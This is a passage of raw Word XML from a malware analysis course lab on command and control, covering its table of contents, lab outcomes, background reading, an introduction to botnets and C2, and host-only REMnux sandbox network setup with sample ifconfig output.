            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>IRC Testing</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc24514476 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="473898B5" w14:textId="77777777" w:rsidR="00DB37E7" w:rsidRDefault="002922E3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc24514477" w:history="1">
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>5.0</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-CA"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Analyzing VertexNET RAT Fingerprinting in C2</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc24514477 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61472C7F" w14:textId="77777777" w:rsidR="00DB37E7" w:rsidRDefault="002922E3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc24514478" w:history="1">
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>6.0</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-CA"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Reversing GET Request Parameters</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc24514478 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0282EEB0" w14:textId="77777777" w:rsidR="00DB37E7" w:rsidRDefault="002922E3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc24514479" w:history="1">
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc24514479 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F93916A" w14:textId="2C580040" w:rsidR="008C2E88" w:rsidRPr="007D01AD" w:rsidRDefault="00F62EC0" w:rsidP="007F2B57">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00A70299">
            <w:rPr>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="272C3736" w14:textId="664ED4C7" w:rsidR="00E45F6E" w:rsidRDefault="00E45F6E" w:rsidP="007F2B57">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41318AED" w14:textId="47C2E5DE" w:rsidR="00117156" w:rsidRPr="00A70299" w:rsidRDefault="00934EB9" w:rsidP="007F2B57">
      <w:pPr>
        <w:pStyle w:val="CourseName"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Malware Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AB712E" w14:textId="6CEC7678" w:rsidR="001D399F" w:rsidRPr="00A70299" w:rsidRDefault="00934EB9" w:rsidP="007F2B57">
      <w:pPr>
        <w:pStyle w:val="LabTitle"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lab </w:t>
      </w:r>
      <w:r w:rsidR="0072059B">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0072059B" w:rsidRPr="0072059B">
        <w:t xml:space="preserve">Malware Command and Control </w:t>
      </w:r>
      <w:r w:rsidR="006A6098">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="0072059B" w:rsidRPr="0072059B">
        <w:t>Part 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DE1E43" w14:textId="2E50228C" w:rsidR="007B6BA5" w:rsidRPr="000537E5" w:rsidRDefault="005476F5" w:rsidP="005476F5">
      <w:pPr>
        <w:pStyle w:val="HeadingStyle1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc24514467"/>
      <w:r>
        <w:t>La</w:t>
      </w:r>
      <w:r w:rsidR="00CA62B7">
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Outcomes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4E3BE8E6" w14:textId="450E4CDA" w:rsidR="007B6BA5" w:rsidRDefault="007B6BA5" w:rsidP="007B6BA5">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This lab will </w:t>
      </w:r>
      <w:r w:rsidR="006740A1">
        <w:t>focus on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the following </w:t>
      </w:r>
      <w:r w:rsidR="006740A1">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00B42018">
        <w:t>utcom</w:t>
      </w:r>
      <w:r w:rsidR="006740A1">
        <w:t>es</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C8A7C7" w14:textId="6A69EE4A" w:rsidR="0072059B" w:rsidRDefault="0072059B" w:rsidP="0072059B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set up DNS/IP spoofing</w:t>
      </w:r>
      <w:r w:rsidR="00D52A6B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD963DF" w14:textId="7CE7715C" w:rsidR="0072059B" w:rsidRDefault="0072059B" w:rsidP="0072059B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r w:rsidR="00D52A6B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>up emulated services</w:t>
      </w:r>
      <w:r w:rsidR="00D52A6B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D92F09" w14:textId="2A70859B" w:rsidR="0072059B" w:rsidRDefault="00D52A6B" w:rsidP="0072059B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Analyze b</w:t>
      </w:r>
      <w:r w:rsidR="0072059B">
        <w:t>asic command and control examples</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B221DBE" w14:textId="09786EF3" w:rsidR="007B6BA5" w:rsidRPr="001D399F" w:rsidRDefault="00CA62B7" w:rsidP="00501C43">
      <w:pPr>
        <w:pStyle w:val="HeadingStyle1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc24514468"/>
      <w:r>
        <w:t>Background Reading</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="13312412" w14:textId="22E49AA6" w:rsidR="00D52A6B" w:rsidRDefault="002922E3" w:rsidP="00E3721C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00E3721C" w:rsidRPr="00E3721C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>REMnux Documentation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E3721C">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00D52A6B" w:rsidRPr="00E3721C">
        <w:t>https://</w:t>
      </w:r>
      <w:r w:rsidR="00711FD6" w:rsidRPr="00E3721C">
        <w:t>REMnux</w:t>
      </w:r>
      <w:r w:rsidR="00D52A6B" w:rsidRPr="00E3721C">
        <w:t>.org/docs/</w:t>
      </w:r>
      <w:r w:rsidR="00E3721C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4184A7" w14:textId="472C54B2" w:rsidR="00D52A6B" w:rsidRDefault="002922E3" w:rsidP="00E3721C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00E3721C" w:rsidRPr="00E3721C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>REMnux Usage Tips for Malware Analysis on Linux</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E3721C" w:rsidRPr="00E3721C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E3721C">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00D52A6B" w:rsidRPr="00E3721C">
        <w:t>https://zeltser.com/</w:t>
      </w:r>
      <w:r w:rsidR="00711FD6" w:rsidRPr="00E3721C">
        <w:t>REMnux</w:t>
      </w:r>
      <w:r w:rsidR="00D52A6B" w:rsidRPr="00E3721C">
        <w:t>-malware-analysis-tips/</w:t>
      </w:r>
      <w:r w:rsidR="00E3721C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DBE89A" w14:textId="4C02368B" w:rsidR="007B6BA5" w:rsidRDefault="002922E3" w:rsidP="00E3721C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00E3721C" w:rsidRPr="00E3721C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>INetSim: Internet Services Simulation Suite</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E3721C" w:rsidRPr="00E3721C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E3721C">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00D52A6B" w:rsidRPr="00E3721C">
        <w:t>http://www.inetsim.org/</w:t>
      </w:r>
      <w:r w:rsidR="00E3721C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E634ABF" w14:textId="72B4DD2C" w:rsidR="00AD3443" w:rsidRDefault="00B00C23" w:rsidP="00501C43">
      <w:pPr>
        <w:pStyle w:val="HeadingStyle1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc24514469"/>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="690C0D32" w14:textId="06038CC0" w:rsidR="00D52A6B" w:rsidRDefault="00D52A6B" w:rsidP="00D52A6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D52A6B">
        <w:t>Command and control is the phrase often used to refer to the communications to and from malware entities. These communications often involve a central server or malicious peers that distribute commands to perform various actions, such as distributed denial-of-service attacks (DDoS) and loading additional malicious code. These commands, therefore, provide a degree of control over the infected nodes. An infected node is often referred to as a bot and multiple nodes make up a bot network or botnet, which is controlled by a bot master. These communications are often obfuscated or encrypted while in transit to prevent eavesdropping by security technologies and security researchers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F62CFC9" w14:textId="77777777" w:rsidR="00925041" w:rsidRDefault="00925041" w:rsidP="00D52A6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C48115" w14:textId="6AC8D4AE" w:rsidR="00501C43" w:rsidRPr="00501C43" w:rsidRDefault="00D52A6B" w:rsidP="00D52A6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In this lab, you will set up a malware command and control analysis environment using a Linux distribution called </w:t>
      </w:r>
      <w:r w:rsidR="00711FD6">
        <w:t>REMnux</w:t>
      </w:r>
      <w:r>
        <w:t>. This distribution provides many tools for malware analysis and research that will assist you in your analysis exercises. You will then look at a basic command and control example from a RAT known as VertexNet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7807B2C6" w14:textId="77777777" w:rsidR="000174C1" w:rsidRDefault="000174C1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D16B910" w14:textId="4E2826C8" w:rsidR="00E87B6C" w:rsidRDefault="002D7572" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="HeadingStyle1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="540"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc24514470"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Network Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="312FE0F8" w14:textId="16D38C04" w:rsidR="000174C1" w:rsidRDefault="000174C1" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="540" w:hanging="540"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc24514471"/>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002D7572" w:rsidRPr="002D7572">
        <w:t>Windows Analysis Machine Network Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0249C827" w14:textId="6BD31258" w:rsidR="002D7572" w:rsidRDefault="002D7572" w:rsidP="000B54DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To prevent the analysis environment’s gateway IP address from changing between runs, edit the configuration file for your host-only vmnet to include a static IP address for the supplied </w:t>
      </w:r>
      <w:r w:rsidR="00711FD6">
        <w:t>REMnux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> virtual machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73309F37" w14:textId="400ACF21" w:rsidR="002D7572" w:rsidRDefault="002D7572" w:rsidP="000B54DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set the network interface to host-only for the </w:t>
      </w:r>
      <w:r w:rsidR="00711FD6">
        <w:t>REMnux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B58FC64" w14:textId="7AFF5E29" w:rsidR="002D7572" w:rsidRDefault="002D7572" w:rsidP="000B54DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Boot the machine and verify that the IP address you configured within the vmnet config is assigned the machine using </w:t>
      </w:r>
      <w:r w:rsidRPr="001146F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:t>. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500F94A5" w14:textId="14D82304" w:rsidR="002D7572" w:rsidRPr="002D7572" w:rsidRDefault="00711FD6" w:rsidP="002D7572">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>REMnux</w:t>
      </w:r>
      <w:r w:rsidR="002D7572" w:rsidRPr="002D7572">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>REMnux</w:t>
      </w:r>
      <w:r w:rsidR="002D7572" w:rsidRPr="002D7572">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:~$ ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C65670" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="002D7572" w:rsidRDefault="002D7572" w:rsidP="002D7572">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7572">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">eth0      Link encap:Ethernet  HWaddr 00:0c:29:09:f0:ac  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EEA7A8" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="002D7572" w:rsidRDefault="002D7572" w:rsidP="002D7572">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7572">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          inet addr:192.168.118.132  Bcast:192.168.118.255  Mask:255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A2AEE1" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="002D7572" w:rsidRDefault="002D7572" w:rsidP="002D7572">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7572">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          inet6 addr: fe80::20c:29ff:fe09:f0ac/64 Scope:Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1B9A52" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="002D7572" w:rsidRDefault="002D7572" w:rsidP="002D7572">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7572">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FC188D" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="002D7572" w:rsidRDefault="002D7572" w:rsidP="002D7572">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7572">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          RX packets:185 errors:0 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0046AE1F" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="002D7572" w:rsidRDefault="002D7572" w:rsidP="002D7572">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7572">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          TX packets:85 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32928705" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="002D7572" w:rsidRDefault="002D7572" w:rsidP="002D7572">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7572">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          collisions:0 txqueuelen:1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A52A7A8" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="002D7572" w:rsidRDefault="002D7572" w:rsidP="002D7572">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7572">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          RX bytes:21763 (21.7 KB)  TX bytes:10957 (10.9 KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF69BEB" w14:textId="77777777" w:rsidR="002D7572" w:rsidRDefault="002D7572" w:rsidP="002D7572"/>
    <w:p w14:paraId="526A39A2" w14:textId="1499B835" w:rsidR="00711FD6" w:rsidRDefault="00711FD6" w:rsidP="000B54DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
